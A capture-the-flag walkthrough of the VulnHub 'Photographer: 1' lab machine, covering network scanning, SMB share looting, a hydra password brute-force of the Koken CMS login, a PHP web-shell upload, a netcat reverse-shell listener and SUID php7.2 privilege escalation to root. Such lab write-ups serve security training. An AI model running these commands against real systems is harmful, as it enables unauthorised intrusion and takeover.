VulnHub: Photographer: 1

Photographer: 1

Initial foothold

1. Network discovery

nmap -sn 10.0.2.27/24

My target is 10.0.2.47.

2. Port scan

nmap -Pn 10.0.2.47
nmap -Pn -p1000- 10.0.2.47

3. OS and service scan

nmap -A -p80,139,445,8000 10.0.2.47

Here’re discovered services:

• 80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
• 139/tcp open netbios-ssn Samba smbd 3.X — 4.X (workgroup: WORKGROUP)
• 445/tcp open netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
• 8000/tcp open http Apache httpd 2.4.18 ((Ubuntu))

Service Enumeration

80/tcp open http Apache httpd 2.4.18 ((Ubuntu))

139/tcp open netbios-ssn Samba smbd 3.X — 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
8000/tcp open http Apache httpd 2.4.18 ((Ubuntu))

1. HTTP on port 80

nikto scan

nikto -h http://10.0.2.47

Directory scan

gobuster dir --wordlist /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -u http://10.0.2.47/ -x php,txt,html,sh,cgi,bak -q
gobuster dir --wordlist /usr/share/dirb/wordlists/big.txt -u http://10.0.2.47/ -x php,txt,html,sh,cgi,bak -q
gobuster dir --wordlist /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-big.txt -u http://10.0.2.47/ -x php,txt,html,sh,cgi,bak -q

Access the site

View page source. Possible username revealed.

2. SMB on port 139 and 445

Scan the service

nmap -p 445 --script=smb-enum-shares.nse,smb-enum-users.nse 10.0.2.47

I got accessible directory.

Access “sambashare” and download files

smbclient //10.0.2.47/sambashare
dir
get mailsent.txt
get wordpress.bkp.zip
exit

Read the file

cat mailsent.txt

I got usernames and emails.

Create user.txt

Create mail.txt

Read wordpress.bkp.zip

unzip wordpress.bkp.zip
ls -la
cd wordpress
ls -la
cat wp-config-sample.php

There’s credential, but I doubt that I can use it. It’s Portugese.

3. HTTP on port 8000

Scan directory using gobuster, but I couldn't scan it.

Use dirbuster instead

There’s /admin directory.

Access the site, this site is build w/ Koken.

View page source, not much revealed.

Search for Koken CMS exploit, I came across this. However, I need credential to exploit it.

Offensive Security's Exploit Database Archive

Access /admin. It’s login page. It also need email which I already saved as mail.txt.

Test input

I got error message. I will use this to crack password w/ hydra.

Intercept the request w/ Burp Suite.

Crack the password w/ hydra

hydra -L mail.txt -P ~/Desktop/rockyou.txt 10.0.2.47 -s 8000 http-post-form "/api.php?/sessions:email=^USER^&password=^PASS^:F=Incorrect. Try again or reset your password." -V -F -u

I got the credential.

Access the site.

Exploitation

1. Follow the exploit guide. Create shell file and save as “image.php.jpg”

2. Import the file

3. Intercept w/ Burp and edit the request

Intercept w/ Burp

Edit the request and forward

Verify upload process

Copy the link

Paste it to the browser and test the shell by supply “id” command

4. Reverse shell

Prepare listener on port 443

rlwrap nc -lvp 443

Intercept the shell request and send to the repeater.

I will use command from this cheat sheet.

Reverse Shell Cheat Sheet

Encode the command to URL w/ Burp Suite’s decoder.

Paste it to cmd parameter and send the request.

Back to listener, now I got the shell.

Privilege Escaltion

1. get TTY shell

python -c 'import pty;pty.spawn("/bin/bash");'

2. Explore the directory. I came across interesting files as listed:

cat /var/www/htmk/koken/storage/configuration/database.php

cat /home/daisa/user.txt

3. Verify SUID

find / -perm -u=s -type f 2>/dev/null

I noticed php7.2

Search in GTFOBins

php | GTFOBins

Follow the guide

CMD="/bin/sh"
/usr/bin/php7.2 -r "pcntl_exec('/bin/sh', ['-p']);"
whoami

Now I’m root.